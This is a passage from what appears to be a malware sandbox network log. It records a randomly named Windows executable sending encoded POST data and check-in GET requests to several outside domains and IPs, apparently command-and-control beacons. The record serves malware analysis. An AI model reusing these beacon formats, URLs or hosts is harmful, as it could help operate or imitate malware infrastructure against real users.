                Data Ascii: hH=DW+FCkdcSeqSUTDd8ueoLdLDEm8P9o6NxBIDZoMQkCddJGmOdPOIYeeqik7XUXeLfFdCKO1/wHfX+5m/qzCRDzSH2hIAocI8il2EZtuqfuH/7pE9dC1gUPnkqa0aKpyrqS+nyR+jgTzE3jN90SHXuPiaRzIhSAAlwm5lkjPsAeDcQTBmTVrXMfxU/EB6


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                18 | 192.168.2.9 | 49732 | 109.95.158.122 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:01.105330944 CEST | 743 | OUT | POST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 33 74 64 4a 6d 57 4f 65 4b 69 49 56 2b 65 71 36 55 37 53 62 33 65 45 66 46 68 37 4b 50 4a 2f 77 47 37 58 2b 34 57 2f 71 41 61 53 52 54 53 4a 37 42 49 43 6c 38 49 38 69 6c 32 45 5a 70 47 41 66 71 54 2f 37 63 4d 39 64 6a 31 68 63 76 6e 6e 72 61 30 61 4f 70 79 6e 71 53 2f 4b 79 56 32 4e 67 52 4c 45 33 68 6c 39 36 6a 48 55 37 2f 69 59 4d 44 4a 6c 55 42 30 76 31 55 68 65 75 56 72 76 41 63 44 72 65 53 68 34 43 6e 69 4d 5a 49 78 7a 34 6a 49 53 4f 56 4b 41 37 54 35 72 65 66 6b 4d 61 65 73 67 6f 52 4b 4b 4c 51 3d 3d
                Data Ascii: hH=DW+FCkdcSeqSGjTd5PeoaNLMBm8PmY7ExA0DZpJNj3tdJmWOeKiIV+eq6U7Sb3eEfFh7KPJ/wG7X+4W/qAaSRTSJ7BICl8I8il2EZpGAfqT/7cM9dj1hcvnnra0aOpynqS/KyV2NgRLE3hl96jHU7/iYMDJlUB0v1UheuVrvAcDreSh4CniMZIxz4jISOVKA7T5refkMaesgoRKKLQ==
                Jul 3, 2024 08:55:02.441793919 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Connection: close
                x-litespeed-tag: 39e_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"
                x-et-api-version: v1
                x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/
                x-et-api-origin: https://mocar.pro
                x-tec-api-version: v1
                x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/
                x-tec-api-origin: https://mocar.pro
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 06:55:02 GMT
                server: LiteSpeed


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                19 | 192.168.2.9 | 49733 | 109.95.158.122 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:03.635739088 CEST | 1756 | OUT | POST /prg5/ HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.mocar.pro
                Referer: http://www.mocar.pro/prg5/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 44 57 2b 46 43 6b 64 63 53 65 71 53 47 6a 54 64 35 50 65 6f 61 4e 4c 4d 42 6d 38 50 6d 59 37 45 78 41 30 44 5a 70 4a 4e 6a 32 35 64 49 56 75 4f 5a 64 32 49 55 2b 65 71 33 30 37 54 62 33 65 6a 66 46 49 7a 4b 50 45 41 77 46 54 58 2b 61 65 2f 37 68 61 53 62 54 53 4a 6e 78 49 48 6f 63 4a 6f 69 6d 66 44 5a 74 71 41 66 71 54 2f 37 64 38 39 4e 69 31 68 61 76 6e 6b 71 61 31 49 4b 70 79 4c 71 54 58 30 79 56 36 7a 67 46 33 45 75 42 31 39 32 77 76 55 6e 76 69 47 63 54 4a 44 55 42 70 31 31 58 46 34 75 52 6a 4a 41 65 54 72 64 30 30 38 47 55 75 54 4b 62 64 67 35 45 34 72 42 78 61 34 69 58 63 70 4f 65 35 6f 4b 63 73 30 73 69 6a 67 52 46 58 61 72 78 6f 53 68 4b 62 57 42 64 6d 54 77 72 75 64 74 57 4b 43 6b 4f 69 62 75 77 44 79 4b 59 4a 64 72 74 30 5a 52 48 6c 35 49 57 36 6d 33 56 48 6d 73 50 6a 4c 76 4e 4c 73 70 4e 57 4a 37 79 61 30 4b 62 41 49 59 6b 6c 68 54 41 4f 42 6d 4b 38 72 53 61 66 63 73 4e 62 4d 55 2b 55 79 68 38 4f 58 7a 48 37 59 67 65 68 4a 62 36 6f 6f 48 4f 62 34 71 39 79 74 68 51 44 62 5a 65 56 [TRUNCATED]
                Jul 3, 2024 08:55:05.044754982 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                Connection: close
                x-litespeed-tag: 39e_HTTP.404
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                link: <https://mocar.pro/wp-json/>; rel="https://api.w.org/"
                x-et-api-version: v1
                x-et-api-root: https://mocar.pro/wp-json/tribe/tickets/v1/
                x-et-api-origin: https://mocar.pro
                x-tec-api-version: v1
                x-tec-api-root: https://mocar.pro/wp-json/tribe/events/v1/
                x-tec-api-origin: https://mocar.pro
                x-litespeed-cache-control: no-cache
                transfer-encoding: chunked
                content-encoding: br
                vary: Accept-Encoding
                date: Wed, 03 Jul 2024 06:55:04 GMT
                server: LiteSpeed


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                20 | 192.168.2.9 | 49734 | 109.95.158.122 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:06.168627024 CEST | 467 | OUT | GET /prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.mocar.pro
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:07.859935045 CEST | 485 | IN | HTTP/1.1 301 Moved Permanently
                Connection: close
                expires: Wed, 11 Jan 1984 05:00:00 GMT
                cache-control: no-cache, must-revalidate, max-age=0
                content-type: text/html; charset=UTF-8
                x-redirect-by: WordPress
                location: http://mocar.pro/prg5/?hH=OUWlBSduFOmbWHHx1+vrCN7lKThtnpeA9WltEIwOsC9+Rnf1YsqGBMTu+SXEa1SqJjg2e+xS43eh4+WwnjHBZw687TI9hNY/lW63YeurSsH96+kXOg==&4Z=FRPPB0TP0VK82R4
                x-litespeed-cache: miss
                content-length: 0
                date: Wed, 03 Jul 2024 06:55:07 GMT
                server: LiteSpeed


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                21 | 192.168.2.9 | 49735 | 203.161.49.220 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:12.911125898 CEST | 728 | OUT | POST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6d 30 6b 61 63 72 37 6b 4d 54 77 75 4a 64 59 75 4c 57 70 31 64 4b 59 44 4c 4f 5a 70 53 55 38 2f 79 4c 77 4c 4e 68 4c 51 6d 58 62 61 4f 6c 51 41 6f 69 32 34 75 61 34 66 31 54 4f 67 68 58 69 6f 4a 39 2f 32 5a 58 72 69 45 46 69 68 50 74 4f 52 42 76 70 45 41 75 55 4d 71 6e 55 74 6d 31 59 48 45 30 52 75 2f 30 41 4b 33 52 6b 72 6c 48 6f 4c 55 53 30 2f 51 45 4f 61 55 70 35 77 4c 36 57 6f 4f 6b 54 72 36 45 4a 6b 58 4f 74 30 5a 7a 6e 31 58 52 43 46 35 31 4e 75 59 77 75 76 37 4c 50 56 41 76 32 42 30 33 53 55 57 61 4f 71 2b 4b 64 65
                Data Ascii: hH=FswQWeNiBqtZm0kacr7kMTwuJdYuLWp1dKYDLOZpSU8/yLwLNhLQmXbaOlQAoi24ua4f1TOghXioJ9/2ZXriEFihPtORBvpEAuUMqnUtm1YHE0Ru/0AK3RkrlHoLUS0/QEOaUp5wL6WoOkTr6EJkXOt0Zzn1XRCF51NuYwuv7LPVAv2B03SUWaOq+Kde
                Jul 3, 2024 08:55:13.515974045 CEST | 533 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:13 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                22 | 192.168.2.9 | 49736 | 203.161.49.220 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:15.453695059 CEST | 752 | OUT | POST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 46 73 77 51 57 65 4e 69 42 71 74 5a 6e 55 55 61 54 73 6e 6b 4f 7a 77 74 47 39 59 75 51 47 70 35 64 4b 6b 44 4c 4d 31 35 53 68 55 2f 78 76 30 4c 4d 6a 76 51 6c 58 62 61 57 31 51 2f 6d 43 32 4a 75 61 31 67 31 52 71 67 68 58 32 6f 4a 34 54 32 5a 6b 54 68 47 56 69 6e 41 4e 4f 54 63 66 70 45 41 75 55 4d 71 6d 77 4c 6d 78 30 48 45 42 5a 75 2b 56 41 4e 35 78 6b 73 67 48 6f 4c 66 79 30 37 51 45 50 4a 55 6f 31 4b 4c 38 61 6f 4f 6c 6a 72 36 56 4a 6c 64 4f 74 32 55 54 6d 6b 55 52 6e 55 32 6c 56 51 63 32 75 74 6e 37 4c 4a 44 4f 57 66 6c 46 62 50 44 4e 4f 4e 35 74 55 32 70 55 44 75 53 38 64 6b 2b 42 67 45 6b 62 53 58 5a 79 6b 63 2f 51 3d 3d
                Data Ascii: hH=FswQWeNiBqtZnUUaTsnkOzwtG9YuQGp5dKkDLM15ShU/xv0LMjvQlXbaW1Q/mC2Jua1g1RqghX2oJ4T2ZkThGVinANOTcfpEAuUMqmwLmx0HEBZu+VAN5xksgHoLfy07QEPJUo1KL8aoOljr6VJldOt2UTmkURnU2lVQc2utn7LJDOWflFbPDNON5tU2pUDuS8dk+BgEkbSXZykc/Q==
                Jul 3, 2024 08:55:16.074518919 CEST | 533 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:15 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                23 | 192.168.2.9 | 49737 | 203.161.49.220 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:17.981709957 CEST | 1765 | OUT | POST /csr7/ HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.evertudy.xyz
                Referer: http://www.evertudy.xyz/csr7/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:18.664436102 CEST | 533 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:18 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                24 | 192.168.2.9 | 49738 | 203.161.49.220 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:20.732692957 CEST | 470 | OUT | GET /csr7/?hH=IuYwVr8nXepE7mYHSf+gGVghE+QsK0Y2QdUzXudSXEAptekBSDag4n7LIWAgnje27+AV9TSqmFigDMavfH+dGRiAFdG+fcQhNs0c0ksUo3k2Pm5jlw==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.evertudy.xyz
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:21.331608057 CEST | 548 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:55:21 GMT
                Server: Apache
                Content-Length: 389
                Connection: close
                Content-Type: text/html; charset=utf-8
                Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                25 | 192.168.2.9 | 49739 | 35.227.248.111 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:26.552686930 CEST | 722 | OUT | POST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=22K3e1HjhIYNVmii4EqE/uQO3Zx3GK9Bj7v3dmf7tOnN4TNrEc6l8BmuVj8SDlMqDtiFtIub8hLvs3et+vu7StqWSdOotRqYuJdaXplmu7SFcJaTuITPpBlYXaSEsyD/A5opVKCIYznRSagsImPM4FdYljkFXw/vaFcPXXzJxCBSVftljmGgus6GnQA9
                Jul 3, 2024 08:55:27.206048012 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:27 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:27.208880901 CEST | 157 | IN
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                26 | 192.168.2.9 | 49740 | 35.227.248.111 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:29.093708992 CEST | 746 | OUT | POST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=22K3e1HjhIYNXGSi+j+EueQPqpx3Pq9Fj7z3divNt9DN42xrHYWl5BmueD8XcVMlDt+7tKqb8hfvs3Ot9Y66ANqULtOmyhqYuJdaXoUDu7aFcayT88HOghlfe6SEnSDBA5ofVOauY2jRSbQsIyjD2Fdk6zkXWC6ED0YEYGP5nzszfeN7yUP7776hg3JVAAxX2igZgSDaajHBOu5BIQ==
                Jul 3, 2024 08:55:29.742577076 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:29 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:29.745209932 CEST | 157 | IN
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                27 | 192.168.2.9 | 49741 | 35.227.248.111 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:31.620143890 CEST | 1759 | OUT | POST /qmv1/ HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 1227
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.luo918.com
                Referer: http://www.luo918.com/qmv1/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:32.248908043 CEST | 176 | IN | HTTP/1.1 405 Method Not Allowed
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:32 GMT
                Content-Type: text/html
                Content-Length: 157
                Via: 1.1 google
                Connection: close
                Jul 3, 2024 08:55:32.254739046 CEST | 157 | IN
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                28 | 192.168.2.9 | 49742 | 35.227.248.111 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:34.151087999 CEST | 468 | OUT | GET /qmv1/?hH=70iXdBj3vvgYA1qv9X+C2v5f15BZXYNXgOSbaBLZsvX+/zBEWaSfpSSmWx4BVFALB6Pvk4Cj2RW76gyU8dG7au3WOdqnwjndnKZaLflLsZKJNqTutg==&4Z=FRPPB0TP0VK82R4 HTTP/1.1
                Host: www.luo918.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:55:34.788007021 CEST | 300 | IN | HTTP/1.1 200 OK
                Server: nginx/1.20.2
                Date: Wed, 03 Jul 2024 06:55:34 GMT
                Content-Type: text/html
                Content-Length: 5161
                Last-Modified: Mon, 15 Jan 2024 02:08:28 GMT
                Vary: Accept-Encoding
                ETag: "65a4939c-1429"
                Cache-Control: no-cache
                Accept-Ranges: bytes
                Via: 1.1 google
                Connection: close


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                29 | 192.168.2.9 | 49743 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:40.021502972 CEST | 731 | OUT | POST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=kjbKvVHO/OuFSjlLPyX+P0Lzii/8WxJnJOy/RmjXQrGAM2cM5kOiK9Te7ax9zxzp7Q75FlaqZD5R0qqulNS5OsM/eiMiDnTt7YNTs9bm73Eg63H41JRAUHQZSuvrPrrqpt/LPwXvofMMlXO6f67tRofdd4PRkNGJLCfYmY991UKc3R8MEhNrD5lkW4rM
                Jul 3, 2024 08:55:40.660558939 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:40 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                30 | 192.168.2.9 | 49744 | 91.195.240.19 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:55:42.559837103 CEST | 755 | OUT | POST /dmjt/ HTTP/1.1
                Host: www.fungusbus.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.fungusbus.com
                Referer: http://www.fungusbus.com/dmjt/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Ascii: hH=kjbKvVHO/OuFTGtLNTX+JUL0uC/8dRJjJO+/RjDHQeuAMTgM4hiiGdTew6x4+Rzu7Q3LFgiqZD9R0oyul8SmP8M9YiMgNHTt7YNTs9eB700g6m340rpDKXQaC+vrYbqtpt/iPxLVoaQMlVm6cr7uKYfbTYPHgdf/IwmBoLpc1luY0wcSVTEwWulDRfik5x2NTzqqhChi17epDh0jNg==
                Jul 3, 2024 08:55:43.189490080 CEST | 305 | IN | HTTP/1.1 405 Not Allowed
                date: Wed, 03 Jul 2024 06:55:43 GMT
                content-type: text/html
                content-length: 154
                server: Parking/1.0
                connection: close
                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
